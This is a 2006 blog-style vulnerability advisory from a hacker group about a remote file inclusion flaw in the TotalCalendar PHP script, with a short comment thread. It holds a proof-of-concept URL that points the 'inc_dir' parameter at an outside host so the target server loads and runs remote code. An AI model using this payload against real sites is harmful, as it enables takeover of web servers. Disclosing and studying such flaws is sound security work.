by r0t,der4444,cembo,VietMafia

Wednesday, April 19, 2006

TotalCalendar - Remote code execution bug

====================================
developer's site: www.sweetphp.com
script: TotalCalendar
risk: critical
status: unpatched
discovered by: VietMafia
====================================

Vuln. Description:

This flaw is due to an input validation error in the "about.php"(line 7) auth.php (line 5)
and some others files that do not validate the "$inc_dir" variable properly. Remote attackers can include
malicious scripts and execute arbitrary commands with the privileges of the web server
Totalcalendar module for PhpNuke is vulnerable as well.

example file: about.php

line 7:
...
require_once($inc_dir."config.php");
...

PoC:

http://[target]/[path]/about.php?
inc_dir=http://unsecured-systems.com/forum/

=====================================
Greetings to r0t,der444 & cembo - : )
=====================================

2 Comments:

Blogger r0t told...

VietMafia, its better to say : " Remote file inclusion vuln."

anyway, keep it comming!

6:08 PM

 
Blogger VietMafia told...

r0t,I will take note abt it.
Cheers!

4:06 AM

 

Post a Comment

<< Home

 
Copyright (c) 2006 Pridels Sec Crew